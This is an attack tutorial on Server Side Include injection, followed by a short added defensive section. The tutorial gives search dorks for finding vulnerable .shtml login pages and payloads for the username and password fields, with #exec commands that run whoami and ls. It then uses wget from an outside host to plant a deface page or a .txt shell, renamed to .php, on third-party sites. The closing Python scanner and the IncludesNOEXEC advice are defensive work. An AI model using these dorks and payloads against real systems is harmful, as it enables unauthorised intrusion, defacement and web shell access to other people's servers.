SSI (Server Side Include) Injection, Shell and Deface Page uploading Tutorial
Server Side Include injection lets you upload files with multiple extensions, but you can't execute your shell if you upload it with a .php extension; you have to upload it as shell.txt and rename it to shell.php.

Let's begin.

Dorks

    inurl:bin/Cklb/
    inurl:login.shtml
    inurl:login.shtm
    inurl:login.stm
    inurl:search.shtml
    inurl:search.shtm
    inurl:search.stm
    inurl:forgot.shtml
    inurl:forgot.shtm
    inurl:forgot.stm
    inurl:register.shtml
    inurl:register.shtm
    inurl:register.stm
    inurl:login.shtml?page=

Try any dork or find sites manually. To check whether a website is vulnerable, enter these commands in the Username and Password fields:

    <!--#echo var="DATE_LOCAL" -->

It will show the date.

    <!--#exec cmd="whoami"-->

It will display which user is running on the server.

    <pre><!--#exec cmd="ls -a" --></pre>

(Linux) It will show all files in the directory.

    <!-- #exec cmd="dir" -->

(Windows) It will display all files in the directory.

Enter

    <pre><!--#exec cmd="ls -a" --></pre>

in Username and Password to view all files of the website.

To upload a deface page, host/upload your deface page anywhere (you can use pastehtml.com for it), then enter this command in Username and Password:

    <!--#exec cmd="wget http://website.com/deface.html" -->

To view your deface page, go to site.com/deface.html.

To upload a shell on the website, you have to host your shell anywhere in .txt format, then enter this command in the login:

    <!--#exec cmd="wget http://website.com/abc.txt" -->

To check whether your txt file was uploaded, list all files using

    <pre><!--#exec cmd="ls -a" --></pre>

Now you have to change the .txt extension to .php. To rename your txt file to php, use this command:

    <!--#exec cmd="mv abc.txt abc.php" -->

Now go to site.com/abc.php and access your shell :)

Live demo (please don't harm the site; upload your files for testing only! Thanks)
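Seen from the server side, every step above arrives as an SSI directive inside a login form field, so it can be flagged before the value is ever written into an .shtml page. The scanner below is an added example, not part of the original tutorial; the field names and sample request bodies are constructed, and the severity labels are an assumption of this example.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# mod_include directive names; optional whitespace after "<!--" also catches
# the "<!-- #exec" variant shown on this page.
SSI_RE = re.compile(
    r"<!--\s*#\s*(exec|echo|include|printenv|config|set|fsize|flastmod)\b", re.I)
# Commands the page chains through #exec to fetch and rename a file.
STAGING_RE = re.compile(r"\b(wget|curl|mv)\b", re.I)


def decode_fully(value, max_rounds=3):
    """Undo repeated URL-encoding so %253C!--%2523exec is still seen."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_form_body(body):
    """Return findings for one urlencoded form body or query string."""
    findings = []
    for field, raw in parse_qsl(body, keep_blank_values=True):
        value = decode_fully(raw)
        m = SSI_RE.search(value)
        if not m:
            continue
        directive = m.group(1).lower()
        severity = "high" if directive == "exec" else "medium"
        if directive == "exec" and STAGING_RE.search(value):
            severity = "critical"  # download/rename step of the upload chain
        findings.append({"field": field, "directive": directive, "severity": severity})
    return findings


# Constructed sample bodies (not captured traffic); field names are assumptions.
SAMPLES = [
    "username=alice&password=correct+horse",
    "username=%3C%21--%23echo+var%3D%22DATE_LOCAL%22+--%3E&password=x",
    "username=x&password=%253C%2521--%2523exec%2520cmd%253D%2522whoami%2522--%253E",
    "username=%3C%21--%23exec+cmd%3D%22wget+http%3A%2F%2Fwebsite.com%2Fabc.txt%22+--%3E&password=x",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_form_body(body) or "clean", "<-", body[:60])
```

Detection is a backstop: the fix is to HTML-encode user input before it reaches any page parsed for SSI, and on Apache to serve such pages with `Options IncludesNOEXEC` so that `#exec` is disabled.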